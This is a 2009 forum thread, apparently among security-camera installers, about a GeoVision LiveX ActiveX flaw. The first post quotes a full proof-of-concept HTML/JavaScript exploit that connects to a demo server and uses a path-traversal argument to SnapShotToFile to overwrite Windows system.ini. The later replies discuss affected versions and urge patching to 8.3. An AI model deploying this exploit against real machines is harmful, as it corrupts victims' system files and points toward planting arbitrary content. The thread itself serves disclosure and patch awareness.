bchance 0 Posted February 25, 2009 Vulnerability Released Feb. 16th 2009: <!-- GeoVision LiveX_v8200 ActiveX Control (LIVEX_~1.OCX) remote file corruption poc by Nine:Situations:Group::SnoopyAssault site: http://retrogod.altervista.org/ working against IE8b/xpsp3, safe for scripting and for initialize. LiveX_v7000 with clsid {DA8484DE-52DB-4860-A986-61A8682E298A} LiveX_v8120 with clsid {F4421170-DB22-4551-BBFB-FFCFFB419F6F} have the same SnapShotToFile() and SnapShotX() methods this poc connects to a live demo server and replaces system.ini with jpeg content... could we set arbitrary content (???) ... maybe trough a fake server, checking ... --> <html> <head> <script language="JavaScript"> function sleep(n) { var now = new Date(); var exitTime = now.getTime() + (n*1000); while (true) { now = new Date(); if (now.getTime() > exitTime) return; } } </script> </head> <body> <object classid="clsid:8D58D690-6B71-4ee8-85AD-006DB0287BF1" id="WebCamX1" width="360" height="300"> <param name="IpAddress" value="http://24.248.47.203" ref> <!-- demo server --> <param name="DisablePWD" value="-1"> <param name="UserName" value="wec"> <param name="Password" value=""> <param name="CommandPort" value="4550"> <param name="DataPort" value="5550"> <param name="AudioDataPort" value="6550"> <param name="BandWidth" value="LAN"> <param name="FixSize" value="0"> <param name="FixWidth" value="320"> <param name="FixHeight" value="240"> <param name="SvrType" value="0"> <param name="AutoLogin" value="0"> <param name="DefaultCam" value="1"> <param name="AutoReConnect" value="-1"> <param name="MaxRetries" value="-1"> <param name="RetryInterval" value="70"> </object> <script language="JavaScript"> sleep(2); //WebCamX1.SetCntDeviceType(0); //WebCamX1.EnableAutoScreenSize(1); //WebCamX1.SetInfo(125,1,0,"",""); //WebCamX1.SetInfo(129,1,0,"",""); //WebCamX1.SetUpdateInfo(100, "WebCam", 0, "", 8200, 0,0); //WebCamX1.DefaultCam = 1; WebCamX1.PlayX(); sleep(2); WebCamX1.SnapShotToFile("../../../../../../../../../../../windows/system.ini"); WebCamX1.SnapShotX(); </script> </body> </html> Great... so basically now if you have a client who can view their cams from the internet(not lan) and some hacker cracks/guesses the password they can severely mess with your system. The notes in the writeup suggest they are looking into submitting arbritary code into the dvr such as a virus or a backdoor. This could certaintly endanger your clients. I've spoke with USAVision and they have escalated it to the engineers as well as notified the HQ. This is not good. Share this post Link to post Share on other sites
brankorackovic 0 Posted February 25, 2009 is this from gv v8.2? Share this post Link to post Share on other sites
bchance 0 Posted February 25, 2009 ver 8.2 ver 8.120 ver 7.0 these three per the author's notes are vulnerable due to the method of saving snapshots. once again not good. Share this post Link to post Share on other sites
rory 0 Posted March 1, 2009 I cant verify this even works as I dont have a test DVR right now. However even if it does, it shouldnt do anything as system.ini is not an executable. Share this post Link to post Share on other sites
bchance 0 Posted May 7, 2009 Sorry to dig this up but just wanted to let everyone know that you need to update your systems to 8.3. The 8.3 update was not just for new features but for certain security aspects. There have been at least 3 brand new vulnerabilities since 09. Two in February and one in March. Feel free to google Geovision Vulnerability so you can understand how big of an issue this is. A lot of companies spend all their time getting the jobs done and not securing things that hold their reputation. For instance leaving default passwords on routers, switches, cameras, and software. In this case it's keeping your software updated. If old versions are out there they are vulnerable. Share this post Link to post Share on other sites
